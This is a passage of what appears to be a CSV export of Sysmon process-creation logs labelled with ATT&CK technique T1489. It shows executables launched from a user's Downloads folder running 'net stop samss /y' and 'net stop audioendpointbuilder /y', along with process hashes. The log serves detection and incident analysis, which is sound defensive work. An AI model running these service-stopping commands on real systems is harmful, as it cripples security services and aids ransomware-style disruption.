MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1b3c-5ec9-0000-00102c552a00} +ParentProcessId: 290920 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:46:52.926647800Z"",""eventRecordID"":""1729"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:46:52.911\r\nProcessGuid: {df9fc3d3-1b3c-5ec9-0000-0010596a2a00}\r\nProcessId: 291752\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1b3c-5ec9-0000-00102c552a00}\r\nParentProcessId: 290920\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:46:52.911"",""processGuid"":""{df9fc3d3-1b3c-5ec9-0000-0010596a2a00}"",""processId"":""291752"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1b3c-5ec9-0000-00102c552a00}"",""parentProcessId"":""290920"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:46:54.278",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:46:52.756 +ProcessGuid: {df9fc3d3-1b3c-5ec9-0000-001073602a00} +ProcessId: 291108 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:46:52.761412100Z"",""eventRecordID"":""1728"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:46:52.756\r\nProcessGuid: {df9fc3d3-1b3c-5ec9-0000-001073602a00}\r\nProcessId: 291108\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-23 12:46:52.756"",""processGuid"":""{df9fc3d3-1b3c-5ec9-0000-001073602a00}"",""processId"":""291108"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:46:54.263",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:46:52.529 +ProcessGuid: {df9fc3d3-1b3c-5ec9-0000-00102c552a00} +ProcessId: 290920 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:46:52.565290200Z"",""eventRecordID"":""1727"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:46:52.529\r\nProcessGuid: {df9fc3d3-1b3c-5ec9-0000-00102c552a00}\r\nProcessId: 290920\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-23 12:46:52.529"",""processGuid"":""{df9fc3d3-1b3c-5ec9-0000-00102c552a00}"",""processId"":""290920"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:46:41.517",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:46:40.170 +ProcessGuid: {df9fc3d3-1b30-5ec9-0000-001072cb2700} +ProcessId: 266028 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1b2f-5ec9-0000-00103bb92700} +ParentProcessId: 265608 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:46:40.173863200Z"",""eventRecordID"":""1726"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:46:40.170\r\nProcessGuid: {df9fc3d3-1b30-5ec9-0000-001072cb2700}\r\nProcessId: 266028\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1b2f-5ec9-0000-00103bb92700}\r\nParentProcessId: 265608\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:46:40.170"",""processGuid"":""{df9fc3d3-1b30-5ec9-0000-001072cb2700}"",""processId"":""266028"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1b2f-5ec9-0000-00103bb92700}"",""parentProcessId"":""265608"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:46:41.497",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:46:39.930 +ProcessGuid: {df9fc3d3-1b2f-5ec9-0000-001082b92700} +ProcessId: 265616 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1b2f-5ec9-0000-001074ae2700} +ParentProcessId: 1660 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:46:39.989961900Z"",""eventRecordID"":""1725"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:46:39.930\r\nProcessGuid: {df9fc3d3-1b2f-5ec9-0000-001082b92700}\r\nProcessId: 265616\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1b2f-5ec9-0000-001074ae2700}\r\nParentProcessId: 1660\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:46:39.930"",""processGuid"":""{df9fc3d3-1b2f-5ec9-0000-001082b92700}"",""processId"":""265616"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1b2f-5ec9-0000-001074ae2700}"",""parentProcessId"":""1660"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:46:41.481",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:46:39.926 +ProcessGuid: {df9fc3d3-1b2f-5ec9-0000-00103bb92700} +ProcessId: 265608 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00} +ParentProcessId: 6352 +ParentImage: C:\Users\John Williams\Downloads\cUIyKIO.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\cUIyKIO.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:46:39.944232200Z"",""eventRecordID"":""1724"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:46:39.926\r\nProcessGuid: {df9fc3d3-1b2f-5ec9-0000-00103bb92700}\r\nProcessId: 265608\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00}\r\nParentProcessId: 6352\r\nParentImage: C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-23 12:46:39.926"",""processGuid"":""{df9fc3d3-1b2f-5ec9-0000-00103bb92700}"",""processId"":""265608"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-0010fd610b00}"",""parentProcessId"":""6352"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:46:41.466",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:46:39.736 +ProcessGuid: {df9fc3d3-1b2f-5ec9-0000-001074ae2700} +ProcessId: 1660 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00} +ParentProcessId: 6352 +ParentImage: C:\Users\John Williams\Downloads\cUIyKIO.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\cUIyKIO.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:46:39.782687500Z"",""eventRecordID"":""1723"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:46:39.736\r\nProcessGuid: {df9fc3d3-1b2f-5ec9-0000-001074ae2700}\r\nProcessId: 1660\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00}\r\nParentProcessId: 6352\r\nParentImage: C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-23 12:46:39.736"",""processGuid"":""{df9fc3d3-1b2f-5ec9-0000-001074ae2700}"",""processId"":""1660"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop 